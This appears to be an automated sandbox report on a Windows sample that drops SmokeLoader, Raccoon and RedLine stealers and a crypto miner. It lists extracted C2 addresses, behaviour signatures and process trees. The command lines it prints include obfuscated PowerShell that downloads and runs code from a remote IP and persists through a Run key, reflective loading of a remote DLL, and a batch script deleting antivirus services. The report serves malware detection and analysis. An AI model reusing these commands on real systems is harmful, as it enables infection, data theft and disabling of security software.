Analysis
-
max time kernel: 150s
max time network: 156s
platform: windows10_x64
resource: win10v20210410
submitted: 12-08-2021 04:27
Static task: static1
Behavioral task: behavioral1 (Sample: 92b685aedd90d350504624e142c53b24.exe, Resource: win7v20210408)
Behavioral task: behavioral2 (Sample: 92b685aedd90d350504624e142c53b24.exe, Resource: win10v20210410)
General
-
Target: 92b685aedd90d350504624e142c53b24.exe
Size: 319KB
MD5: 92b685aedd90d350504624e142c53b24
SHA1: ab0db0c63accdd0d6b83f995d302b5885c60d9ad
SHA256: e0be41471fb0457c80e1c8a10efc91c223183838ecadbddd200376cfd9c2721a
SHA512: 2fabf92a35a53810c576d06f710659b268f660e81be072dc133a786c1d669d161d6007d6e13b710a7170db6fb9333f2903991b479818c3eac9cef00c4e181dbe
Malware Config
Extracted (URL): http://91.241.19.52/Api/GetFile2
Extracted: smokeloader, 2020; C2 URLs:
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted: raccoon, 2ca2376c561d1af7f8b9e6f3256b06220a3db187, url4cnc: https://telete.in/johnyes13
Extracted: redline, @gasfer_dark, C2: 207.154.240.76:80
Extracted: raccoon, cd8dc1031358b1aec55cc6bc447df1018b068607, url4cnc: https://telete.in/jagressor_kz
Extracted: raccoon, 471c70de3b4f9e4d493e418d1f60a90659057de0, url4cnc: https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4764 | 2484 | schtasks.exe |
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4712 | 2484 | schtasks.exe |
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4796 | 2484 | schtasks.exe |
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4860 | 2484 | schtasks.exe |
-
Raccoon Stealer Payload 4 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/2344-173-0x0000000002E30000-0x0000000002EC3000-memory.dmp | family_raccoon
  behavioral2/memory/2344-178-0x0000000000400000-0x0000000002CB1000-memory.dmp | family_raccoon
  behavioral2/memory/3360-193-0x0000000000400000-0x0000000000946000-memory.dmp | family_raccoon
  behavioral2/memory/4384-549-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\C858.exe | family_redline
  C:\Users\Admin\AppData\Local\Temp\C858.exe | family_redline
  C:\Users\Admin\AppData\Local\Temp\DCEE.exe | family_redline
  C:\Users\Admin\AppData\Local\Temp\DCEE.exe | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
  description | pid | process | target process
  PID 2948 created 2344 | 2948 | WerFault.exe | D4FD.exe
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
  flow | pid | process
  39 | 2464 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
  pid process: 2296 BCCE.exe; 1460 BCCE.tmp; 2208 BCCE.exe; 684 BCCE.tmp; 1160 C858.exe; 4000 CCDD.exe; 3864 fsucenter.exe; 2784 D01A.exe; 2344 D4FD.exe; 3360 D78E.exe; 3776 Runtimebroker.exe; 2960 DCEE.exe; 4384 D01A.exe; 4592 Database.exe; 4652 install.exe; 4680 HostData.exe; 4700 Database.exe; 4792 Database.exe; 4864 Database.exe; 4980 Database.exe; 5072 Database.exe; 5108 Database.exe; 4168 Database.exe; 4228 Database.exe; 4100 Database.exe; 4176 Database.exe; 2408 Database.exe; 4312 Database.exe; 1348 Database.exe; 3756 Database.exe; 2960 Database.exe; 4424 Database.exe; 2764 Database.exe; 4480 Database.exe; 3860 Database.exe; 4476 Database.exe; 2868 Database.exe; 848 Database.exe; 2752 Database.exe; 4552 Database.exe; 3924 Database.exe; 3952 install.exe; 1636 install.exe; 4580 Database.exe; 1240 Database.exe; 4752 Database.exe; 4964 Database.exe; 4980 Database.exe; 5112 Database.exe; 3472 Database.exe; 2268 explorer.exe; 4224 Database.exe; 4228 Database.exe; 4172 Database.exe; 2788 Database.exe; 3680 Database.exe; 2328 Database.exe; 4268 Database.exe; 1108 Database.exe; 4428 Database.exe; 3888 Database.exe; 3732 Database.exe; 1304 Database.exe; 800 Database.exe
-
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Database.exe (29 entries)
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Database.exe (34 entries)
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C858.exe (1 entry)
-
Deletes itself 1 IoCs
Processes:
  pid | process
  3036 |
-
Drops startup file 1 IoCs
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe
-
Loads dropped DLL 6 IoCs
Processes:
  pid | process
  3864 | fsucenter.exe
  3360 | D78E.exe (5 entries)
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\C858.exe | themida
  C:\Users\Admin\AppData\Local\Temp\C858.exe | themida
  behavioral2/memory/1160-141-0x0000000001280000-0x0000000001281000-memory.dmp | themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Documents and Settings\\services.exe\"" | install.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fsucenter = "\"C:\\Users\\Admin\\AppData\\Roaming\\BI Video Controller for x86 systems\\log20210812_043241\\fsucenter.exe\"" | install.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fsucenter = "\"C:\\Users\\Admin\\AppData\\Roaming\\BI Video Controller for x86 systems\\log20210812_043303\\fsucenter.exe\"" | install.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\twain_32\\explorer.exe\"" | install.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Database.exe (all remaining entries)
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C858.exe (1 entry)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
  pid | process
  1160 | C858.exe
  Database.exe, three entries per pid: 4592, 4700, 4792, 4864, 4980, 5072, 5108, 4168, 4228, 4100, 4176, 2408, 4312, 1348, 3756, 2960, 4424, 2764, 4480, 3860, 4476
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
  description | pid | process | target process
  PID 2016 set thread context of 2884 | 2016 | 92b685aedd90d350504624e142c53b24.exe | 92b685aedd90d350504624e142c53b24.exe
  PID 2784 set thread context of 4384 | 2784 | D01A.exe | D01A.exe
  PID 4652 set thread context of 1636 | 4652 | install.exe | install.exe
-
Drops file in Windows directory 2 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\twain_32\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | install.exe
  File created | C:\Windows\twain_32\explorer.exe | install.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
Processes:
  pid | pid_target | process | target process
  3980 | 2344 | WerFault.exe | D4FD.exe
  2772 | 2344 | WerFault.exe | D4FD.exe
  964 | 2344 | WerFault.exe | D4FD.exe
  3180 | 2344 | WerFault.exe | D4FD.exe
  2948 | 2344 | WerFault.exe | D4FD.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 92b685aedd90d350504624e142c53b24.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 92b685aedd90d350504624e142c53b24.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 92b685aedd90d350504624e142c53b24.exe
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  4764 | schtasks.exe
  4712 | schtasks.exe
  4796 | schtasks.exe
  4860 | schtasks.exe
-
Modifies registry class 3 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance |
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance |
  Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | install.exe
-
Modifies system certificate store
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | fsucenter.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] | fsucenter.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid | process
  2884 | 92b685aedd90d350504624e142c53b24.exe (2 entries)
  3036 | (62 entries, process name not recorded)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
  pid | process
  3036 |
-
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
  pid | process
  2884 | 92b685aedd90d350504624e142c53b24.exe
  3036 | (18 entries, process name not recorded)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  Token: SeShutdownPrivilege | 3036 |  and  Token: SeCreatePagefilePrivilege | 3036 |  (23 alternating pairs, 46 entries)
  Token: SeDebugPrivilege | 1160 | C858.exe
  Token: SeRestorePrivilege | 3980 | WerFault.exe
  Token: SeBackupPrivilege | 3980 | WerFault.exe
  Token: SeDebugPrivilege | 3980 | WerFault.exe
  Token: SeShutdownPrivilege | 3036 |  and  Token: SeCreatePagefilePrivilege | 3036 |  (2 pairs, 4 entries)
  Token: SeDebugPrivilege | 2772 | WerFault.exe
  Token: SeShutdownPrivilege | 3036 |
  Token: SeCreatePagefilePrivilege | 3036 |
  Token: SeDebugPrivilege | 964 | explorer.exe
  Token: SeDebugPrivilege | 2960 | DCEE.exe
  Token: SeDebugPrivilege | 3180 | explorer.exe
  Token: SeDebugPrivilege | 3296 | powershell.exe
  Token: SeDebugPrivilege | 2948 | WerFault.exe
  Token: SeShutdownPrivilege | 3036 |
  Token: SeCreatePagefilePrivilege | 3036 |
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
  pid | process
  684 | BCCE.tmp
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
  pid | process
  3036 |
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process
  PID 2016 wrote to memory of 2884 | 2016 | 92b685aedd90d350504624e142c53b24.exe | 92b685aedd90d350504624e142c53b24.exe (6 entries)
  PID 3036 wrote to memory of 2296 | 3036 | | BCCE.exe (3 entries)
  PID 2296 wrote to memory of 1460 | 2296 | BCCE.exe | BCCE.tmp (3 entries)
  PID 1460 wrote to memory of 2208 | 1460 | BCCE.tmp | BCCE.exe (3 entries)
  PID 2208 wrote to memory of 684 | 2208 | BCCE.exe | BCCE.tmp (3 entries)
  PID 3036 wrote to memory of 1160 | 3036 | | C858.exe (3 entries)
  PID 3036 wrote to memory of 4000 | 3036 | | CCDD.exe (3 entries)
  PID 684 wrote to memory of 3864 | 684 | BCCE.tmp | fsucenter.exe (3 entries)
  PID 3036 wrote to memory of 2784 | 3036 | | D01A.exe (3 entries)
  PID 3036 wrote to memory of 2344 | 3036 | | D4FD.exe (3 entries)
  PID 3036 wrote to memory of 3360 | 3036 | | D78E.exe (3 entries)
  PID 4000 wrote to memory of 3776 | 4000 | CCDD.exe | Runtimebroker.exe (3 entries)
  PID 3036 wrote to memory of 2960 | 3036 | | DCEE.exe (3 entries)
  PID 3036 wrote to memory of 2296 | 3036 | | explorer.exe (4 entries)
  PID 3776 wrote to memory of 3296 | 3776 | Runtimebroker.exe | powershell.exe (3 entries)
  PID 3036 wrote to memory of 3100 | 3036 | | explorer.exe (3 entries)
  PID 3036 wrote to memory of 2288 | 3036 | | explorer.exe (4 entries)
  PID 3036 wrote to memory of 3180 | 3036 | | explorer.exe (3 entries)
  PID 3036 wrote to memory of 964 | 3036 | | explorer.exe (4 entries)
  PID 3036 wrote to memory of 2512 | 3036 | | explorer.exe (1 entry)
Processes
-
C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe (process tree depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe (process tree depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\92b685aedd90d350504624e142c53b24.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\BCCE.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\BCCE.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-VC816.tmp\BCCE.tmp (process tree depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\is-VC816.tmp\BCCE.tmp" /SL5="$6005C,4193427,831488,C:\Users\Admin\AppData\Local\Temp\BCCE.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\BCCE.exe (process tree depth 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\BCCE.exe" /VERYSILENT
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-4CV6T.tmp\BCCE.tmp (process tree depth 4)
Command line: "C:\Users\Admin\AppData\Local\Temp\is-4CV6T.tmp\BCCE.tmp" /SL5="$60058,4193427,831488,C:\Users\Admin\AppData\Local\Temp\BCCE.exe" /VERYSILENT
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe (process tree depth 5)
Command line: "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe (process tree depth 6)
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe (process tree depth 6)
Command line: "C:\ProgramData\Data\install.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe (process tree depth 7)
Command line: "C:\ProgramData\Data\install.exe"
- Executes dropped EXE
-
C:\ProgramData\Data\install.exe (process tree depth 7)
Command line: "C:\ProgramData\Data\install.exe"
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe (process tree depth 8)
Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XRAnpEIiD2.bat"
-
C:\Windows\SysWOW64\chcp.com (process tree depth 9)
Command line: chcp 65001
-
C:\Windows\SysWOW64\w32tm.exe (process tree depth 9)
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
C:\Windows\System32\w32tm.exe (process tree depth 10)
Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
-
C:\Windows\twain_32\explorer.exe (process tree depth 9)
Command line: "C:\Windows\twain_32\explorer.exe"
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exe (process tree depth 6)
Command line: NULL
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 6 instances with identical command line and behaviour
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 1 instance
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 13 instances with identical command line and behaviour
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 13 instances with identical command line and behaviour
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 1 instance
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 6 instances with identical command line and behaviour
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 1 instance
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 4 instances with identical command line and behaviour
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe (process tree depth 6), 2 instances with identical command line and behaviour
Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\C858.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\C858.exe
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\CCDD.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\CCDD.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe (process tree depth 2)
Command line: "C:\ProgramData\Runtimebroker.exe"
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (process tree depth 3)
Command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (process tree depth 3)
Command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (process tree depth 4)
Command line: "powershell" Get-MpPreference -verbose
-
C:\Windows\SysWOW64\cmd.exe (process tree depth 4)
Command line: "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete 
"HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t 
REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d 